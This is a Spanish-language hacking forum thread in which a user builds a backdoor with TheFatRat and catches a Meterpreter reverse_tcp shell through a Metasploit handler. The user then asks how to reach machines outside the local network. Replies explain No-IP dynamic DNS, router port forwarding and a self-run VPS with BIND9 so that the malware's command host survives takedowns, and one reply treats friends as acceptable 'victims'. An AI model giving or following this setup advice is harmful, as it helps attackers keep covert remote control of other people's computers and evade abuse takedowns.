[SOLUCIONADO] Configurar NoIP para usarlo en hacking remoto

Iniciado por Blest777, Mayo 13, 2017, 04:21:29 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 13, 2017, 04:21:29 PM Ultima modificación: Mayo 20, 2017, 08:45:48 AM por xyz
Buenas tardes

Estoy tratando de crear un backdoor con TheFatRat utilizando el siguiente procedimiento:

Código: bash
./fatrat
Opción 2
LHOST: La IP que me sale en wlan0
LPORT: 4444.
Nombre del exe: prueba.


Luego paso el backdoor a mi otra PC. Entro al terminal y escribo:

Código: bash
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost: La IP que me sale en wlan0
set lport 4444
exploit


Hasta este punto voy bien. Logro obtener la conexión y el meterpreter. Ahora me surgen varias dudas:

¿Cómo hacer ese procedimiento con una computadora que no se encuentre en mi red (remotamente)? ¿cuales son los comandos a utilizar?
¿Cómo configurar mi IP con NOIP para que cuando me conecte a la otra PC no tenga problemas y no se pierda la conexión?

He creado una cuenta de NOIP e incluso e instalado el software en Kali Linux 2.0. Ahora, ¿cómo hago para configurarlo y usarlo luego con TheFatRat con el BackDoor? Ya aprendí a crear la persistencia, pero cómo hago para usar la misma IP siempre para conectarme a la otra PC?

Gracias por leerme y por su tiempo. Espero haberme expresado bien. Saludos.







... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

bueno a decir verdad yo no te lo recomiendo a no ser que sea para victimas como amigos, personas que quizas no sean tus amigos pero que no sepan nada de nada y que a su ves lo que hagas no sea del todo criminal por decirlo asi xD, tal ves algunos cibers repito no te metas en lios con capturar pass ajenas en vainas de bancs, en fin ya que tu pc no cuenta con una ip estatica no-ip puede ser la solucion mas lamers a tener en cuenta, luego que habres tu cuenta y configuras el cliente en tu maquina este tendras que activarlo por la linea de comandos, si mal no recuerdo este es el comando
Código: text
 /usr/local/bin/noip2
te todas formas en la documentacion queda claro, esta la encuentras en la propia pagina, ya luego de estar activo en tu config LHOST seria igual a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o la que hayas registrado, este siempre tendra como referencia tu ip actual, gracias a tu cliente.. no hay mucho que entender aqui es simplemente como trabaja la resolucion de dominios publicos, es decir no-ip no se ase con una ip para ti solito si no que el nombre de host que obtienes es el encargado de redireccionar tu ip a ese host

Hola Blest777 para salir a internet tendrias que poner tu ip publica en donde pone LHOST y entrar a tu router a la seccion de port fordwarding para redirigir la entrada de paquetes hacia tu computadora, antes de ponerte a intentar romper cualquier cosa te sugiero que estudies mas informática y que pases tiempo dedicando a aprender. si no que gracia tiene? ejecutar programas que hacen el trabajo y quedarte pasmao intentando creer que sabes algo xD
saludos y paz


sobre lo de noip hay cientos de miles de millones de sitios donde lo pone es cuestion de mirar un poco

Muchas gracias por sus respuestas  :)
No pienso utilizar lo poquito que sé para hacer cosas ilegales.

Investigando con las informaciones que me dieron quiero saber si voy bien:



Después abro el terminal y cuando NOIP me pida el host escribo: ka****.ddns.net

Ahora ejecuto noip2 -S para ser si está corriendo y listo.

Después que haga eso, ¿mi ip será estática?

*******************************

Ahora con el puerto del modem (tengo dudas).

¿Cómo hago para abrir los puertos de mi modem marca Huawei modelo HG532e? no he encontrado un tutorial valido para el mio.











... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Una Ip es estática cuando el ISP te lo asigna, tambien puedes verificar diariamente en
Código: text
http://www.cualesmiip.com/

si ves que todas las veces que verificas (cada 24 horas por ejemplo) es la misma ip, entonces si tiens dirección ip estática.
Caso opuesto, tienes dirección ip dinámica.

Lo único que realizan estos servicios de DNS dinámicos es asignar el nombre de host que has elegido como entrada estática a tu ip dinámica.

Saludos !


No uses jamás en la vida noip para lo que mencionas en el titular de tu   post  || entrada

Si de verdad quieres hacer las cosas bien -->VPS-->BIND9 y resolverá tus dns de forma
controlada por tí.

Si consideras que usar un servicio "gratuito" es "seguro" hazlo y experimentarás sentirte
observado.

                                         (▀̿Ĺ̯▀̿ ̿) <-------->(▀̿Ĺ̯▀̿ ̿)


 
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No uses jamás en la vida noip para lo que mencionas en el titular de tu   post  || entrada

Si de verdad quieres hacer las cosas bien -->VPS-->BIND9 y resolverá tus dns de forma
controlada por tí.


La primera linea, por que?

La segunda opción de configuración (VPS - BIND9), tienes mas información al respecto?

Mayo 22, 2017, 05:43:46 PM #7 Ultima modificación: Mayo 22, 2017, 05:47:55 PM por Hu3c0
Hubo un momento no me acuerdo del año exacto en el que microsoft metió las garras en noip
fue una época en la que todo el mundo de una forma u otra utilizabamos ese servicio.
Cuando entró microsoft a noip dicho de forma basta empezarón a caer los remotos a diestro y
a siniestro.
Mi lógica e intuición me dicen que no use un servicio que va a resolver los dns de un malware
Ahora te hago yo una pregunta a tí:

¿Confíarías tu ip verdadera a un servicio gratuito que sabe que lo estás usando con fines iĺícitos
y que sabe en todo momento a que puerta tiene que tocar si ocurren cosas malas?

Yo no me dedico a eso pero si lo hiciera no lo utilizaría. A la segunda pregunta te contesto de
forma más extensa.

Un VPS es un servidor privado virtual o lo que es lo mismo puedes  montarte un Windows Linux
online. Yo te aconsejo una distro de Linux por ejemplo un Ubuntu una vez instalado Ubuntu remo-
tamente instalas BIND9  y lo configuras para que resuelva dominios.

Como una imagen vale más que mil palabras te muestro videotutoriales de instalación y configu
ración de Bind9  ------->No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SaLuDoS





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta